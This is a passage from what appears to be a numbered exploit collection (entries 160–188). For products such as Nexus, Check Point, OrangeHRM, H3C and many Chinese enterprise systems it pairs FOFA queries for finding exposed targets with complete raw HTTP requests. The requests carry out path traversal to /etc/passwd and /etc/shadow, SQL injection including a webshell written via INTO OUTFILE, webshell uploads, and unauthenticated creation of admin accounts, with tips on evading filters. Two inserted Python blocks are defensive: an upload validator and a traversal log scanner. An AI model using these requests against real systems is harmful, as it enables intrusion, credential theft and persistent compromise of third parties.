<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

bufValue carries the file body (elided here as PAYLOAD, as elsewhere in this post). The uploaded web service is then called directly:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal / arbitrary file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The encoded slashes and dots must reach the server undecoded; send the request from a repeater or with curl --path-as-is, since ordinary clients normalize the path first.

161. Keytop (科拓) smart parking fee system Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload. <fileName> sets the file name (traversal is accepted), <fileFlow> is the file content, base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the written file: http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

The remotePath field chooses the directory and the client file name is kept: http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Huixiaoyuan / Anxiaoyi (慧校园/安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The server stores the upload under a fixed name: http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
Injection via the sortOrder parameter. URL (truncated in the source):
https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

solutionNo decodes to ' AND 4172 IN (SELECT (CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(111)))-- bErE. This is error-based injection on MSSQL: the string "hello" built from CHAR() cannot be converted to int, so it is echoed back in the conversion error.

167. Jingyi (精益) value management system DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing EHR (宏景EHR) OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

The path parameter is an application-specific encoded file path; the value above is reproduced from the source as-is.

169. Hongjing EHR (宏景EHR) downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Time-based (MSSQL WAITFOR DELAY): a 5-second response confirms it. The /templates/attestation/../../ prefix is presumably there to reach the handler through a path the authentication filter does not match; send it undecoded and unnormalized.

170. Hongjing EHR (宏景EHR) DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle tracking platform SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

Time-based (MySQL SLEEP). The ;downloadLogger.action suffix is a servlet path parameter: it changes how the URI looks to the authentication filter while the framework still routes the request to delete.do.

172. DT high-definition license-plate recognition camera arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Send the request line raw (curl --path-as-is or a repeater); normal clients strip the ../ segments before sending.

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

The traversal travels in the POST body, not the URL, so URL-only logging or WAF rules will not see it.

174. Jinhe OA (金和OA) C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe OA (金和OA) C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+x
ml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Time-based (MSSQL WAITFOR DELAY) in the numeric IncentiveID parameter; no quote is needed to break out.

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
The device configuration file is requested through a userLogin.asp/../ prefix; the file name depends on the model (one path per model):
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus-network self-service system flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Note that the stored file name comes from the form field name, not from filename=. Then fetch the file:
GET /imc/primepush/%2e%2e/flex/12234.txt

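The upload entries above (155, 157, 159, 161, 162, 163, 164, 176 and 178) all get past the same server-side omission: the handler keeps the client-supplied file name (sometimes with ../ in it) and, at most, trusts the client-supplied Content-Type. The following is an added example, not code from this post or from any of the affected vendors. It contrasts the naive check those handlers effectively perform with a validator that rejects every sample in the list; the file names and bodies are constructed from the PoCs above, and the magic-byte table and extension list are this example's own choices.

```python
import re
import secrets

# Magic bytes for the only types a logo/avatar/material upload needs.
ALLOWED_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}
EXPECTED_CTYPE = {"png": "image/png", "jpg": "image/jpeg", "gif": "image/gif", "pdf": "application/pdf"}

# Server-side executable extensions, matched anywhere in the name so that
# double extensions such as "shell.php.png" are caught as well.
EXECUTABLE_EXT = re.compile(
    r"\.(php\d?|phtml|phar|jsp|jspx|asp|aspx|asmx|ashx|cer|cshtml|cgi|pl|sh)(?=[.;]|$)",
    re.IGNORECASE,
)


def naive_accepts(filename, declared_content_type):
    """The pattern the PoCs above walk through: trust the client's
    Content-Type header (or check nothing) and keep the client's file name."""
    return declared_content_type.lower().startswith("image/")


def validate_upload(filename, declared_content_type, data):
    """Return (accepted, reason, stored_name).

    declared_content_type never influences the decision: it is attacker
    controlled (every PoC above sends image/png or image/jpeg with a web
    shell as the body). It is only reported as a mismatch signal for logging."""
    # 1. No path components: only a bare file name is acceptable.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if base != filename or base in ("", ".", ".."):
        return False, "path separator or traversal in filename", None
    # 2. Executable extension anywhere in the name.
    if EXECUTABLE_EXT.search(base):
        return False, "server-executable extension", None
    # 3. Extension allowlist, normalised.
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    ext = {"jpeg": "jpg"}.get(ext, ext)
    if ext not in ALLOWED_MAGIC:
        return False, f"extension not in allowlist: {ext or '(none)'}", None
    # 4. The body must really be that type; the header is not consulted.
    if not data.startswith(ALLOWED_MAGIC[ext]):
        return False, "file body does not match extension", None
    # 5. Server-chosen name, so the client never controls the stored path.
    stored = f"{secrets.token_hex(8)}.{ext}"
    reason = "ok" if declared_content_type.lower() == EXPECTED_CTYPE[ext] else "ok; content-type header disagreed"
    return True, reason, stored


# Constructed samples taken from the PoCs above (bodies shortened).
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLES = [
    ("test.php", "image/png", b"<?php phpinfo();unlink(__FILE__);?>"),        # entries 155, 176
    ("kjldycpvjrm.jsp", "application/octet-stream", b"nyhelxrutzwhrsvsrafb"),  # entry 157
    ("../../../../dizxdell.aspx", "text/xml", b"andqbmFnc3phc3d1ZGh0bmhwYXc="),  # entry 161
    ("qaz.aspx", "image/jpeg", b'<%@Page Language="C#"%>'),                   # entry 164
    ("shell.php.png", "image/png", PNG_HEADER),                               # double extension
    ("logo.png", "image/png", b"<?php system('id');"),                        # PHP behind a .png name
    ("logo.png", "image/png", PNG_HEADER),                                    # legitimate upload
]


def run_samples():
    """(name, naive decision, hardened decision) for every sample."""
    return [
        (name, naive_accepts(name, ctype), validate_upload(name, ctype, body)[0])
        for name, ctype, body in SAMPLES
    ]


if __name__ == "__main__":
    for name, naive, hardened in run_samples():
        print(f"{name:28} naive={naive!s:5} hardened={hardened}")
```

The naive check accepts five of the seven samples, the hardened one accepts only the real PNG. Step 5 matters as much as the others: a random server-chosen name with a fixed extension removes the "upload then browse to it" step every entry above relies on, even if a later check is bypassed.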
179. Jianwen (建文) engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

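Entries 160, 168 to 174, 177, 178 and 179 are all path-traversal requests, but they arrive in very different shapes: percent-encoded slashes (160), %2e%2e (178), a servlet ;parameter (171), traversal inside a query parameter (167, 174) or inside the POST body (173, 179). Matching access logs on the literal PoC strings therefore misses most of them. The following is an added example, not part of the original post: a small triage helper that normalizes the request target the way a lax backend would (repeated percent-decoding, // collapsing, ;parameter stripping, .. resolution) and flags requests that climb above the web root, touch a sensitive file, or carry traversal in the query string. The log lines are constructed in combined-log format from the request lines above; body-borne traversal (173, 179) is only visible if the server logs request bodies.

```python
import re
from typing import List, NamedTuple, Tuple
from urllib.parse import unquote

# Files the traversal PoCs above go after; matched case-insensitively
# against the normalised path and the decoded query string.
SENSITIVE_TARGETS = (
    "/etc/passwd", "/etc/shadow", "web.config", "web-inf/web.xml",
    "log4net.config", "jhfileconfig.ini",
)
CFG_DOWNLOAD = re.compile(r"\.cfg$", re.IGNORECASE)   # H3C router configs (entry 177)
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


class NormPath(NamedTuple):
    path: str             # what a lax backend would end up opening
    had_dotdot: bool      # any '..' segment, even if it never left the root
    escaped_root: bool    # '..' climbed above '/'
    had_path_param: bool  # ';name' segment parameter (entry 171 style)


def decode_fully(s: str, rounds: int = 3) -> str:
    """Percent-decode until stable, so %252e%252e and %2e%2e both become '..'."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def normalize_path(target: str) -> NormPath:
    path = decode_fully(target.split("?", 1)[0])
    had_param = ";" in path
    out: List[str] = []
    had_dotdot = escaped = False
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]   # drop servlet path parameters
        if seg in ("", "."):         # also collapses runs of '/'
            continue
        if seg == "..":
            had_dotdot = True
            if out:
                out.pop()
            else:
                escaped = True
            continue
        out.append(seg)
    return NormPath("/" + "/".join(out), had_dotdot, escaped, had_param)


def is_sensitive(path: str) -> bool:
    low = path.lower()
    return any(t in low for t in SENSITIVE_TARGETS) or bool(CFG_DOWNLOAD.search(low))


def triage_target(target: str) -> Tuple[str, List[str]]:
    """Return (normalised path, reasons); an empty reason list means benign."""
    reasons: List[str] = []
    norm = normalize_path(target)
    if norm.had_dotdot:
        reasons.append("dotdot-in-path")
    if norm.escaped_root:
        reasons.append("escapes-webroot")
    if norm.had_path_param:
        reasons.append("path-parameter")
    if is_sensitive(norm.path):
        reasons.append("sensitive-target")
    query = decode_fully(target.split("?", 1)[1]).lower() if "?" in target else ""
    if "../" in query or "..\\" in query or any(t in query for t in SENSITIVE_TARGETS):
        reasons.append("traversal-in-query")   # entries 167 and 174 put the path in a parameter
    return norm.path, reasons


def scan(lines):
    """Return (method, normalised path, reasons) for every flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m:
            path, reasons = triage_target(m.group("target"))
            if reasons:
                hits.append((m.group("method"), path, reasons))
    return hits


# Constructed combined-format log lines reproducing request lines from the PoCs above.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jun/2024:10:01:02 +0800] "GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1432 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [05/Jun/2024:10:01:03 +0800] "GET /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [05/Jun/2024:10:01:04 +0800] "GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1" 200 57 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [05/Jun/2024:10:01:05 +0800] "POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [05/Jun/2024:10:01:06 +0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [05/Jun/2024:10:01:07 +0800] "GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1" 200 911 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for method, path, reasons in scan(SAMPLE_LOG):
        print(f"{method} {path}: {', '.join(reasons)}")
```

Five of the six sample lines are flagged; only /index.html passes. The "dotdot-in-path" reason fires even when the path never leaves the root (the H3C and Hongjing prefixes), because a legitimate client has no reason to emit .. at all; tune SENSITIVE_TARGETS to the products you actually run.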
180. Bangguanke CRM (帮管客CRM) jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Error-based (MySQL updatexml): the database user name is returned inside the XPATH syntax error message.

181. Runshen (润申) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (广州图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Error-based Oracle injection in the token parameter (ctxsys.drithsx.sn): the product 111111*111111 = 12345654321 appears in the error text. The endpoint is a password-change handler (loginid, newpassword), so keep loginid set to a non-existent account, as the PoC does, when verifying.

184. Xunrao (迅饶) X2Modbus gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The request body is a raw SQL INSERT that the endpoint executes, creating the account root / 123456 with PURVIEW 4.

185. Realor Tianyi (瑞友天翼) application virtualization system SQL injection
Affected: version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

appid decodes to 3');select unhex('<hex>') into outfile '.\\..\\..\\WebRoot\\plom.xgi'# : a stacked query that writes a file into WebRoot via INTO OUTFILE. The hex is <?php echo md5("1"); $file = __FILE__; unlink($file);, a stub that prints md5("1") and deletes itself, so the check is whether /plom.xgi returns c4ca4238a0b923820dcc509a6f75849b once.

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic (solar) power plants.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

Time-based confirmation for SQLite, which has no sleep function: RANDOMBLOB(250000000) forces a heavy computation, so the injected request responds noticeably slower than a plain one.

187. Mura CMS processAsyncObject SQL injection (time-based variant of entry 158)
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. Santi Jiahui (叁体-佳会) video conferencing attachment arbitrary file read
Affected: version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
